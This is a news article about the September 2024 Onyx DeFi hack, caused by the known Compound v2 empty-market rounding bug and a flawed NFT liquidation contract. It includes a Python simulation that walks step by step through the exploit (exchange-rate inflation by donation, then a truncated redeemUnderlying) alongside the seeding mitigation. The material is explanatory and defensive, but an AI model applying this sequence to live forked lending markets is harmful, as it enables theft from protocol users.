Lesson Not Learned: Onyx Loses $3.8 Million Due to Old Vulnerability

The protocol was attacked again due to a bug in Compound Finance v2.

On September 26, the decentralized finance (DeFi) protocol Onyx was attacked, and the attackers made off with assets worth about $3.8 million. The incident was reported by the blockchain security platform PeckShield. The root cause was a well-known bug in the Compound Finance v2 codebase, the same bug that had already been used against Onyx in November of last year.



According to the report, a separate flaw in the protocol's NFT liquidation contract also facilitated the attack. That contract did not properly validate user-supplied input, which allowed the attackers to inflate the self-liquidation reward.



The Onyx team confirmed that this vulnerable contract was in use and identified it as the main factor behind the incident.

According to PeckShield, the attackers withdrew 4.1 million Virtual USD (VUSD), 7.35 million Onyxcoin (XCN), 0.23 Wrapped Bitcoin (WBTC), about $5,000 in the Dai (DAI) stablecoin, and $50,000 in the Tether (USDT) stablecoin. Total losses exceeded $3.8 million.

This known vulnerability in the Compound Finance v2 codebase has been exploited repeatedly against DeFi protocols that forked it. In April 2023 the Hundred Finance protocol fell to the same bug, and in November 2023 it was used against Onyx for the first time.

The vulnerability can only be exploited in an "empty market", a market with essentially no cTokens outstanding, which is the usual state of a market right after it is launched. That is what left Onyx exposed. According to the protocol team, however, the main cause of the incident was the flaw in the NFT liquidation contract.

PeckShield's account agrees with this, describing the problematic contract as an additional factor in the attack. Its bug came down to insufficient validation of user-supplied input, which let the attackers manipulate the size of the liquidation rewards.
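To make the "empty market" condition concrete, here is a constructed model of the Compound v2 arithmetic that the attack relies on. This is an added example, not code from Onyx, Compound or PeckShield: it reproduces the cToken exchange-rate formula, the truncating redeemUnderlying path, a direct donation of underlying, and the comptroller's hypothetical-liquidity check. The 1:1 price, the initial exchange rate, the 1,000,000-token donation, and the 50% collateral factor are assumptions, not the Onyx figures. The same run with a seeded market shows why a few wei of total supply is the precondition.

```python
"""Constructed model of the Compound v2 "empty market" rounding bug (added example)."""

EXP_SCALE = 10**18
# Assumed initial rate: 0.02 underlying per cToken (18-decimal underlying, 8-decimal cToken).
INITIAL_EXCHANGE_RATE = 2 * 10**26


class CToken:
    """Minimal cToken: `cash` is the contract's underlying balance; no borrows or reserves."""

    def __init__(self) -> None:
        self.cash = 0
        self.total_supply = 0
        self.balances: dict[str, int] = {}

    def exchange_rate(self) -> int:
        # exchangeRateStoredInternal: initial rate while no cTokens exist,
        # otherwise cash / totalSupply scaled by 1e18.
        if self.total_supply == 0:
            return INITIAL_EXCHANGE_RATE
        return self.cash * EXP_SCALE // self.total_supply

    def mint(self, who: str, amount: int) -> int:
        tokens = amount * EXP_SCALE // self.exchange_rate()
        self.cash += amount
        self.total_supply += tokens
        self.balances[who] = self.balances.get(who, 0) + tokens
        return tokens

    def redeem(self, who: str, tokens: int) -> int:
        amount = tokens * self.exchange_rate() // EXP_SCALE
        self._burn(who, tokens, amount)
        return amount

    def redeem_underlying(self, who: str, amount: int) -> int:
        # The bug: the cTokens to burn are truncated, so once a single cToken is worth
        # a huge amount the caller takes almost two cTokens' worth of underlying for one.
        tokens = amount * EXP_SCALE // self.exchange_rate()
        self._burn(who, tokens, amount)
        return tokens

    def donate(self, amount: int) -> None:
        # Plain ERC-20 transfer to the cToken address: no cTokens minted,
        # so every outstanding cToken is now backed by more underlying.
        self.cash += amount

    def _burn(self, who: str, tokens: int, amount: int) -> None:
        if self.balances.get(who, 0) < tokens or self.cash < amount:
            raise ValueError("insufficient balance")
        self.balances[who] -= tokens
        self.total_supply -= tokens
        self.cash -= amount


def borrow_capacity(m: CToken, tokens: int, cf: int) -> int:
    """Comptroller-style capacity for `tokens` of collateral, price 1:1, cf scaled by 1e18."""
    underlying = tokens * m.exchange_rate() // EXP_SCALE
    return underlying * cf // EXP_SCALE


def run_attack(seed_underlying: int, donation: int, cf: int) -> dict:
    """Play the attack against an empty market (seed 0) or a pre-seeded one."""
    m = CToken()
    if seed_underlying:
        # Mitigation: the deployer mints (and effectively burns) some supply before
        # the market goes live, so totalSupply is never a handful of wei.
        m.mint("dead", seed_underlying)
    spent = received = 0
    # 1. end up holding exactly 2 wei of cTokens
    spent += 10**18
    tokens = m.mint("attacker", 10**18)
    received += m.redeem("attacker", tokens - 2)
    # 2. inflate the exchange rate with a direct transfer
    spent += donation
    m.donate(donation)
    # 3. borrow another asset, sized so that the comptroller's redeemAllowed check
    #    (collateral left after burning ONE cToken) still passes
    borrow = borrow_capacity(m, 1, cf)
    # 4. the largest redeemUnderlying amount that still truncates to 1 cToken burned
    rate = m.exchange_rate()
    amount = min(m.cash, (2 * rate - 1) // EXP_SCALE)
    assert borrow_capacity(m, 2 - 1, cf) >= borrow  # hypothetical liquidity check passes
    burned = m.redeem_underlying("attacker", amount)
    received += amount
    left = borrow_capacity(m, m.balances["attacker"], cf)
    return {
        "burned": burned,
        "redeemed": amount,
        "borrow": borrow,
        "profit": received + borrow - spent,  # the borrow is never repaid
        "bad_debt": max(borrow - left, 0),
    }


if __name__ == "__main__":
    ONE = 10**18
    for seed in (0, ONE):
        r = run_attack(seed, donation=1_000_000 * ONE, cf=ONE // 2)
        print(f"seed={seed / ONE:g}: burned {r['burned']} cToken, redeemed {r['redeemed'] / ONE:,.6f}, "
              f"borrowed {r['borrow'] / ONE:,.6f}, profit {r['profit'] / ONE:,.6f}")
```

In the empty market the attacker burns one of two cTokens, recovers the whole donation minus 1 wei, and walks away with a borrow worth a quarter of the donation against collateral now worth 1 wei. In the seeded market the donation is shared with the pre-minted supply, so the same sequence loses almost the entire donation; that is why forks are advised to mint and burn a non-trivial amount of cTokens when listing a market.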

This incident is not an isolated case in decentralized finance. In September alone several other projects were hit through vulnerabilities: on September 27 the Bedrock protocol lost more than $2 million because of a bug in its uniBTC contract, and on September 23 the Bankroll Network project lost $230,000 in an attack that abused the "buyFor" vulnerability to inflate the attackers' gains.
